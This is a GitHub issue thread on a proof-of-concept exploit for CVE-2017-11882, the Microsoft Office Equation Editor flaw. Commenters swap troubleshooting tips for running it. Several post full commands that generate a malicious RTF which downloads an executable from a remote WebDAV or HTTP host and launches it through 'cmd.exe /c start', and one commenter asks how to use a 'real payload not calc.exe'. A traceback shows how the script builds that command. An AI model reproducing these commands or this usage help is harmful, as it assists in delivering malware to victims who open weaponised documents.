-
Notifications
You must be signed in to change notification settings - Fork 183
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
about exploit #1
Comments
Seems like that it uses UNC path, according to my understanding that is path to file shared on the network. Although i am also interested to download file using http. |
Hi - i can't run thise exploite - and exploite massage but not work word file |
can you explain that step by step |
According to your screenshot, you missed one leading backslash. This can be caused by your shell environment. Maybe |
I am still confused how it is working. |
hi guys for any reason the exploits does not works fine, maybe must use this: "//" and not "\" i have been this problem. python webdav_exec_CVE-2017-11882.py -u //192.168.0.100/temp -e //192.168.0.100/temp/1.exe -o example.rtf thanks good job!! |
Hi, so I connected my local PC to my cpanel thru webdisk and after some trials, I was able to get the exploit to work and execute payload on my local PC. But wen I run the same file on another PC which is not connected to my cpanel webdisk, it does not download the payload. |
Hi
can you please explain how to to use this POC
i tried many ways it's not working
i mean with real payload not calc.exe
python webdav_exec_CVE-2017-11882.py -u http://192.168.1.166/payload.exe -e payload.exe -o test.rtf
but it's show me error
Traceback (most recent call last):
File "webdav_exec_CVE-2017-11882.py", line 152, in
rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
File "webdav_exec_CVE-2017-11882.py", line 137, in create_rtf
ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
File "webdav_exec_CVE-2017-11882.py", line 129, in create_ole_exec_primitive
raise ValueError("primitive command must be shorter than 43 bytes")
ValueError: primitive command must be shorter than 43 bytes
Thanks
The text was updated successfully, but these errors were encountered: